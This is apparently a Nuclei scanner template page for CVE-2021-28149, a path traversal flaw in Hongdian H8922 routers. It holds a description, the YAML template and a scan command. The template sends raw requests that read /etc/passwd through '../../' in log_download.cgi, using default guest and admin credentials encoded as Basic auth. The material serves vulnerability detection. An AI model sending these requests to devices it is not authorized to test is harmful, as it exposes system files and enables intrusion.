Hongdian H8922 3.0.5 Devices - Local File Inclusion
ID: CVE-2021-28149
Severity: medium
Author: gy741
Tags: cve2021,cve,hongdian,traversal
Description
Section titled “Description”Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
YAML Source
Section titled “YAML Source”id: CVE-2021-28149
info: name: Hongdian H8922 3.0.5 Devices - Local File Inclusion author: gy741 severity: medium description: | Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - https://github.com/ARPSyndicate/cvemon - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.05499 epss-percentile: 0.93036 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve2021,cve,hongdian,traversal
http: - raw: - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream"
- type: regex part: body regex: - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]"
- type: status status: - 200# digest: 4b0a00483046022100dd89bbaafa891893c30ded7c9edc9a002c3c6a6bbe55f23a0a62ea2fcb34f83d022100b00d15db873660526881a4f261f6e804ef9d41f3ee52c8d9401788156045eef3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-28149.yaml"